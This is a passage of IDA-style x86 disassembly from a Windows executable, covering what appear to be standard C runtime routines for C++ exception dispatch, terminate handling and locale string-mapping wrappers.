mov [ebp+arg_0], esi
call sub_40539D
mov eax, [eax+8Ch]
push 1
push esi
mov [ebp+arg_8], eax
call sub_4101B0
test eax, eax
pop ecx
pop ecx
jnz short loc_40BAC1
call sub_40BEA5
loc_40BAC1: ; CODE XREF: sub_40BA07+B3�j
cmp [esi], edi
jnz short loc_40BAEB
cmp dword ptr [esi+10h], 3
jnz short loc_40BAEB
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BAE0
cmp eax, 19930521h
jz short loc_40BAE0
cmp eax, 19930522h
jnz short loc_40BAEB
loc_40BAE0: ; CODE XREF: sub_40BA07+C9�j
; sub_40BA07+D0�j
cmp dword ptr [esi+1Ch], 0
jnz short loc_40BAEB
call sub_40BEA5
loc_40BAEB: ; CODE XREF: sub_40BA07+BC�j
; sub_40BA07+C2�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz loc_40BB86
call sub_40539D
mov edi, [eax+94h]
call sub_40539D
push [ebp+arg_0]
xor esi, esi
mov [eax+94h], esi
call sub_40B43B
test al, al
pop ecx
jnz short loc_40BB7E
xor ebx, ebx
cmp [edi], ebx
jle short loc_40BB45
loc_40BB28: ; CODE XREF: sub_40BA07+13C�j
mov eax, [edi+4]
mov ecx, [ebx+eax+4]
push offset off_423E50
call sub_403017
test al, al
jnz short loc_40BB4A
inc esi
add ebx, 10h
cmp esi, [edi]
jl short loc_40BB28
loc_40BB45: ; CODE XREF: sub_40BA07+11F�j
; sub_40BA07+31C�j
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40BB4A: ; CODE XREF: sub_40BA07+134�j
push 1
push [ebp+arg_0]
call sub_40B3C2
pop ecx
pop ecx
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_2C]
mov [ebp+arg_0], offset dword_41DC2C
call sub_402C0C
push offset dword_4216E4
lea eax, [ebp+var_2C]
push eax
mov [ebp+var_2C], offset off_41DC24
call sub_4041BB
loc_40BB7E: ; CODE XREF: sub_40BA07+119�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
loc_40BB86: ; CODE XREF: sub_40BA07+50�j
; sub_40BA07+69�j ...
cmp [esi], edi
jnz loc_40BD16
cmp dword ptr [esi+10h], 3
jnz loc_40BD16
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BBB1
cmp eax, 19930521h
jz short loc_40BBB1
cmp eax, 19930522h
jnz loc_40BD16
loc_40BBB1: ; CODE XREF: sub_40BA07+196�j
; sub_40BA07+19D�j
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jbe loc_40BC7D
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+arg_18]
push edi
call sub_404466
add esp, 14h
mov edi, eax
loc_40BBD7: ; CODE XREF: sub_40BA07+26E�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jnb loc_40BC7A
mov eax, [ebp+var_8]
cmp [edi], eax
jg loc_40BC6F
cmp eax, [edi+4]
jg short loc_40BC6F
mov eax, [edi+10h]
mov [ebp+var_C], eax
mov eax, [edi+0Ch]
test eax, eax
mov [ebp+var_18], eax
jle short loc_40BC6F
loc_40BC03: ; CODE XREF: sub_40BA07+23C�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea ebx, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_14], eax
jle short loc_40BC38
loc_40BC15: ; CODE XREF: sub_40BA07+22F�j
push dword ptr [esi+1Ch]
mov eax, [ebx]
push eax
push [ebp+var_C]
mov [ebp+var_20], eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40BC47
dec [ebp+var_14]
add ebx, 4
cmp [ebp+var_14], eax
jg short loc_40BC15
loc_40BC38: ; CODE XREF: sub_40BA07+20C�j
dec [ebp+var_18]
add [ebp+var_C], 10h
cmp [ebp+var_18], 0
jg short loc_40BC03
jmp short loc_40BC6F
; ---------------------------------------------------------------------------
loc_40BC47: ; CODE XREF: sub_40BA07+224�j
push [ebp+arg_1C]
mov ebx, [ebp+var_C]
push [ebp+arg_18]
mov [ebp+var_1], 1
push [ebp+var_20]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
call sub_40B8A9
mov esi, [ebp+arg_0]
add esp, 1Ch
loc_40BC6F: ; CODE XREF: sub_40BA07+1E1�j
; sub_40BA07+1EA�j ...
inc [ebp+var_10]
add edi, 14h
jmp loc_40BBD7
; ---------------------------------------------------------------------------
loc_40BC7A: ; CODE XREF: sub_40BA07+1D6�j
mov edi, [ebp+arg_10]
loc_40BC7D: ; CODE XREF: sub_40BA07+1B1�j
cmp [ebp+arg_14], 0
jz short loc_40BC8D
push 1
push esi
call sub_40B3C2
pop ecx
pop ecx
loc_40BC8D: ; CODE XREF: sub_40BA07+27A�j
cmp [ebp+var_1], 0
jnz loc_40BD45
mov eax, [edi]
and eax, 1FFFFFFFh
cmp eax, 19930521h
jb loc_40BD45
mov edi, [edi+1Ch]
test edi, edi
jz loc_40BD45
push esi
call sub_40B43B
test al, al
pop ecx
jnz loc_40BD45
call sub_40539D
call sub_40539D
call sub_40539D
mov [eax+88h], esi
call sub_40539D
cmp [ebp+arg_1C], 0
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
push esi
jnz short loc_40BCF2
push [ebp+arg_4]
jmp short loc_40BCF5
; ---------------------------------------------------------------------------
loc_40BCF2: ; CODE XREF: sub_40BA07+2E4�j
push [ebp+arg_1C]
loc_40BCF5: ; CODE XREF: sub_40BA07+2E9�j
call sub_40423C
mov esi, [ebp+arg_10]
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
push dword ptr [esi+1Ch]
call sub_40B4B4
loc_40BD16: ; CODE XREF: sub_40BA07+181�j
; sub_40BA07+18B�j ...
mov ebx, [ebp+arg_10]
loc_40BD19: ; CODE XREF: sub_40BA07+41�j
cmp dword ptr [ebx+0Ch], 0
jbe short loc_40BD45
cmp [ebp+arg_14], 0
jnz loc_40BB45
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_8]
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40B915
add esp, 20h
loc_40BD45: ; CODE XREF: sub_40BA07+28A�j
; sub_40BA07+29C�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40BD58
call sub_40BEA5
loc_40BD58: ; CODE XREF: sub_40BA07+85�j
; sub_40BA07+34A�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BA07 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41DC24
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD75 proc near ; CODE XREF: .kSjx934:004042AF�p
; .kSjx934:004042EA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_40539D
cmp dword ptr [eax+20Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_0]
mov edi, 0E06D7363h
mov esi, 1FFFFFFFh
mov ebx, 19930522h
jnz short loc_40BDBE
mov edx, [ecx]
cmp edx, edi
jz short loc_40BDBE
cmp edx, 80000026h
jz short loc_40BDBE
mov edx, [eax]
and edx, esi
cmp edx, ebx
jb short loc_40BDBE
test byte ptr [eax+20h], 1
jnz loc_40BE51
loc_40BDBE: ; CODE XREF: sub_40BD75+27�j
; sub_40BD75+2D�j ...
test byte ptr [ecx+4], 66h
jz short loc_40BDE7
cmp dword ptr [eax+4], 0
jz loc_40BE51
cmp [ebp+arg_14], 0
jnz short loc_40BE51
push 0FFFFFFFFh
push eax
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
jmp short loc_40BE51
; ---------------------------------------------------------------------------
loc_40BDE7: ; CODE XREF: sub_40BD75+4D�j
cmp dword ptr [eax+0Ch], 0
jnz short loc_40BDFF
mov edx, [eax]
and edx, esi
cmp edx, 19930521h
jb short loc_40BE51
cmp dword ptr [eax+1Ch], 0
jz short loc_40BE51
loc_40BDFF: ; CODE XREF: sub_40BD75+76�j
cmp [ecx], edi
jnz short loc_40BE35
cmp dword ptr [ecx+10h], 3
jb short loc_40BE35
cmp [ecx+14h], ebx
jbe short loc_40BE35
mov edx, [ecx+1Ch]
mov edx, [edx+8]
test edx, edx
jz short loc_40BE35
movzx esi, byte ptr [ebp+arg_1C]
push esi
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call edx
add esp, 20h
jmp short loc_40BE54
; ---------------------------------------------------------------------------
loc_40BE35: ; CODE XREF: sub_40BD75+8C�j
; sub_40BD75+92�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call sub_40BA07
add esp, 20h
loc_40BE51: ; CODE XREF: sub_40BD75+43�j
; sub_40BD75+53�j ...
xor eax, eax
inc eax
loc_40BE54: ; CODE XREF: sub_40BD75+BE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40BD75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE59 proc near ; CODE XREF: sub_40B11E:loc_40B152�p
; sub_40B258+22�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040BE80 SIZE 00000012 BYTES
push 8
push offset dword_421720
call __SEH_prolog4
call sub_40539D
mov eax, [eax+78h]
test eax, eax
jz short loc_40BE87
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BE80
sub_40BE59 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_40BE59
loc_40BE80: ; CODE XREF: sub_40BE59+1E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BE87: ; CODE XREF: sub_40BE59+16�j
call sub_4101BD
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40BE92 proc near ; CODE XREF: sub_40B4B4+23�p
call sub_40539D
mov eax, [eax+7Ch]
test eax, eax
jz short loc_40BEA0
call eax
loc_40BEA0: ; CODE XREF: sub_40BE92+A�j
jmp sub_40BE59
sub_40BE92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEA5 proc near ; CODE XREF: sub_404466+1C�p
; sub_404466:loc_4044C7�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_421740
call __SEH_prolog4
push ds:dword_42640C
call sub_405193
pop ecx
test eax, eax
jz short loc_40BED7
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BED0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40BED0: ; CODE XREF: sub_40BEA5+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BED7: ; CODE XREF: sub_40BEA5+1A�j
jmp sub_40BE59
sub_40BEA5 endp
; =============== S U B R O U T I N E =======================================
sub_40BEDC proc near ; CODE XREF: sub_407B19+33�p
push offset sub_40BE59
call sub_405127
pop ecx
mov ds:dword_42640C, eax
retn
sub_40BEDC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF0 proc near ; CODE XREF: sub_40456E+4A�p
; sub_40B29C+77�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_40EC54
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_40BF2F
mov ecx, 2
loc_40BF2F: ; CODE XREF: sub_40BEF0+38�j
push ecx
call sub_40EC54
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_40BEF0 endp
; =============== S U B R O U T I N E =======================================
sub_40BF3C proc near ; CODE XREF: sub_40BF57+220�p
; sub_40BF57+229�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40BF56
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40BF56
push eax
call sub_403603
pop ecx
locret_40BF56: ; CODE XREF: sub_40BF3C+6�j
; sub_40BF3C+11�j
retn
sub_40BF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF57 proc near ; CODE XREF: sub_40C2F9+2C�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp ds:dword_426410, ebx
push edi
mov esi, ecx
jnz short loc_40BFAE
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_41DC3C
push 100h
push ebx
call ds:dword_41D12C
test eax, eax
jz short loc_40BF99
mov ds:dword_426410, edi
jmp short loc_40BFAE
; ---------------------------------------------------------------------------
loc_40BF99: ; CODE XREF: sub_40BF57+38�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40BFAE
mov ds:dword_426410, 2
loc_40BFAE: ; CODE XREF: sub_40BF57+1D�j
; sub_40BF57+40�j ...
cmp [ebp+arg_C], ebx
jle short loc_40BFD5
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40BFB9: ; CODE XREF: sub_40BF57+6A�j
dec ecx
cmp [eax], bl
jz short loc_40BFC6
inc eax
cmp ecx, ebx
jnz short loc_40BFB9
or ecx, 0FFFFFFFFh
loc_40BFC6: ; CODE XREF: sub_40BF57+65�j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40BFD2
inc eax
loc_40BFD2: ; CODE XREF: sub_40BF57+78�j
mov [ebp+arg_C], eax
loc_40BFD5: ; CODE XREF: sub_40BF57+5A�j
mov eax, ds:dword_426410
cmp eax, 2
jz loc_40C18E
cmp eax, ebx
jz loc_40C18E
cmp eax, 1
jnz loc_40C1BF
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40C004
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C004: ; CODE XREF: sub_40BF57+A3�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi
mov edi, eax
cmp edi, ebx
jz loc_40C1BF
jle short loc_40C076
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40C076
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C05D
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C071
mov dword ptr [eax], 0CCCCh
jmp short loc_40C06E
; ---------------------------------------------------------------------------
loc_40C05D: ; CODE XREF: sub_40BF57+F1�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C071
mov dword ptr [eax], 0DDDDh
loc_40C06E: ; CODE XREF: sub_40BF57+104�j
add eax, 8
loc_40C071: ; CODE XREF: sub_40BF57+FC�j
; sub_40BF57+10F�j
mov [ebp+var_C], eax
jmp short loc_40C079
; ---------------------------------------------------------------------------
loc_40C076: ; CODE XREF: sub_40BF57+DA�j
; sub_40BF57+E6�j
mov [ebp+var_C], ebx
loc_40C079: ; CODE XREF: sub_40BF57+11D�j
cmp [ebp+var_C], ebx
jz loc_40C1BF
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi
test eax, eax
jz loc_40C17D
mov esi, ds:dword_41D12C
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40C17D
test word ptr [ebp+arg_4], 400h
jz short loc_40C0ED
cmp [ebp+arg_14], ebx
jz loc_40C17D
cmp ecx, [ebp+arg_14]
jg loc_40C17D
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
jmp loc_40C17D
; ---------------------------------------------------------------------------
loc_40C0ED: ; CODE XREF: sub_40BF57+16B�j
cmp ecx, ebx
jle short loc_40C136
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40C136
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40C11E
call sub_4104B0
mov esi, esp
cmp esi, ebx
jz short loc_40C17D
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C11E: ; CODE XREF: sub_40BF57+1AF�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C132
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C132: ; CODE XREF: sub_40BF57+1D0�j
mov esi, eax
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C136: ; CODE XREF: sub_40BF57+198�j
; sub_40BF57+1A4�j
xor esi, esi
loc_40C138: ; CODE XREF: sub_40BF57+1C5�j
; sub_40BF57+1DD�j
cmp esi, ebx
jz short loc_40C17D
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D12C
test eax, eax
jz short loc_40C176
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40C15F
push ebx
push ebx
jmp short loc_40C165
; ---------------------------------------------------------------------------
loc_40C15F: ; CODE XREF: sub_40BF57+202�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40C165: ; CODE XREF: sub_40BF57+206�j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call ds:dword_41D138
mov [ebp+var_8], eax
loc_40C176: ; CODE XREF: sub_40BF57+1FB�j
push esi
call sub_40BF3C
pop ecx
loc_40C17D: ; CODE XREF: sub_40BF57+13E�j
; sub_40BF57+15F�j ...
push [ebp+var_C]
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C18E: ; CODE XREF: sub_40BF57+86�j
; sub_40BF57+8E�j
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40C1A1
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40C1A1: ; CODE XREF: sub_40BF57+240�j
cmp [ebp+arg_18], ebx
jnz short loc_40C1AE
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C1AE: ; CODE XREF: sub_40BF57+24D�j
push [ebp+arg_0]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40C1C6
loc_40C1BF: ; CODE XREF: sub_40BF57+97�j
; sub_40BF57+D4�j ...
xor eax, eax
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C1C6: ; CODE XREF: sub_40BF57+266�j
cmp eax, [ebp+arg_18]
jz loc_40C2AA
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4102F7
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40C1BF
mov esi, ds:dword_41D130
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C20D
loc_40C206: ; CODE XREF: sub_40BF57+2D0�j
; sub_40BF57+2F9�j
xor esi, esi
jmp loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C20D: ; CODE XREF: sub_40BF57+2AD�j
jle short loc_40C24C
cmp eax, 0FFFFFFE0h
ja short loc_40C24C
add eax, 8
cmp eax, 400h
ja short loc_40C234
call sub_4104B0
mov edi, esp
cmp edi, ebx
jz short loc_40C206
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C234: ; CODE XREF: sub_40BF57+2C5�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C248
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C248: ; CODE XREF: sub_40BF57+2E6�j
mov edi, eax
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C24C: ; CODE XREF: sub_40BF57:loc_40C20D�j
; sub_40BF57+2BB�j
xor edi, edi
loc_40C24E: ; CODE XREF: sub_40BF57+2DB�j
; sub_40BF57+2F3�j
cmp edi, ebx
jz short loc_40C206
push [ebp+var_8]
push ebx
push edi
call sub_407B70
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C27C
xor esi, esi
jmp short loc_40C2A1
; ---------------------------------------------------------------------------
loc_40C27C: ; CODE XREF: sub_40BF57+31F�j
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_4102F7
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40C2A1: ; CODE XREF: sub_40BF57+323�j
push edi
call sub_40BF3C
pop ecx
jmp short loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C2AA: ; CODE XREF: sub_40BF57+272�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D130
mov esi, eax
loc_40C2C4: ; CODE XREF: sub_40BF57+2B1�j
; sub_40BF57+351�j
cmp [ebp+var_C], ebx
jz short loc_40C2D2
push [ebp+var_C]
call sub_403603
pop ecx
loc_40C2D2: ; CODE XREF: sub_40BF57+370�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40C2E5
cmp [ebp+arg_10], eax
jz short loc_40C2E5
push eax
call sub_403603
pop ecx
loc_40C2E5: ; CODE XREF: sub_40BF57+380�j
; sub_40BF57+385�j
mov eax, esi
loc_40C2E7: ; CODE XREF: sub_40BF57+232�j
; sub_40BF57+26A�j
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40BF57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2F9 proc near ; CODE XREF: sub_404816+B6�p
; sub_404816+DB�p ...
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40BF57
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40C33A
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C33A: ; CODE XREF: sub_40C2F9+38�j
leave
retn
sub_40C2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C33C proc near ; CODE XREF: sub_40C4F4+29�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, ds:dword_426414
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40C395
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_41DC3C
push esi
call ds:dword_41D124
test eax, eax
jz short loc_40C37B
mov ds:dword_426414, esi
jmp short loc_40C3AF
; ---------------------------------------------------------------------------
loc_40C37B: ; CODE XREF: sub_40C33C+35�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40C390
push 2
pop eax
mov ds:dword_426414, eax
jmp short loc_40C395
; ---------------------------------------------------------------------------
loc_40C390: ; CODE XREF: sub_40C33C+48�j
mov eax, ds:dword_426414
loc_40C395: ; CODE XREF: sub_40C33C+1D�j
; sub_40C33C+52�j
cmp eax, 2
jz loc_40C46D
cmp eax, ebx
jz loc_40C46D
cmp eax, 1
jnz loc_40C497
loc_40C3AF: ; CODE XREF: sub_40C33C+3D�j
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40C3BF
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C3BF: ; CODE XREF: sub_40C33C+79�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi
mov edi, eax
cmp edi, ebx
jz loc_40C497
jle short loc_40C42A
cmp edi, 7FFFFFF0h
ja short loc_40C42A
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C414
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C428
mov dword ptr [eax], 0CCCCh
jmp short loc_40C425
; ---------------------------------------------------------------------------
loc_40C414: ; CODE XREF: sub_40C33C+C3�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C428
mov dword ptr [eax], 0DDDDh
loc_40C425: ; CODE XREF: sub_40C33C+D6�j
add eax, 8
loc_40C428: ; CODE XREF: sub_40C33C+CE�j
; sub_40C33C+E1�j
mov ebx, eax
loc_40C42A: ; CODE XREF: sub_40C33C+B0�j
; sub_40C33C+B8�j
test ebx, ebx
jz short loc_40C497
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi
test eax, eax
jz short loc_40C461
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call ds:dword_41D124
mov [ebp+var_8], eax
loc_40C461: ; CODE XREF: sub_40C33C+112�j
push ebx
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C46D: ; CODE XREF: sub_40C33C+5C�j
; sub_40C33C+64�j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40C47C
mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40C47C: ; CODE XREF: sub_40C33C+136�j
cmp [ebp+arg_10], ebx
jnz short loc_40C489
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C489: ; CODE XREF: sub_40C33C+143�j
push [ebp+arg_14]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C49B
loc_40C497: ; CODE XREF: sub_40C33C+6D�j
; sub_40C33C+AA�j ...
xor eax, eax
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C49B: ; CODE XREF: sub_40C33C+159�j
cmp eax, [ebp+arg_10]
jz short loc_40C4BE
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_4102F7
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40C497
mov [ebp+arg_4], esi
loc_40C4BE: ; CODE XREF: sub_40C33C+162�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:dword_41D128
cmp esi, ebx
mov edi, eax
jz short loc_40C4E0
push esi
call sub_403603
pop ecx
loc_40C4E0: ; CODE XREF: sub_40C33C+19B�j
mov eax, edi
loc_40C4E2: ; CODE XREF: sub_40C33C+12F�j
; sub_40C33C+15D�j
lea esp, [ebp-14h]
pop edi
pop esi
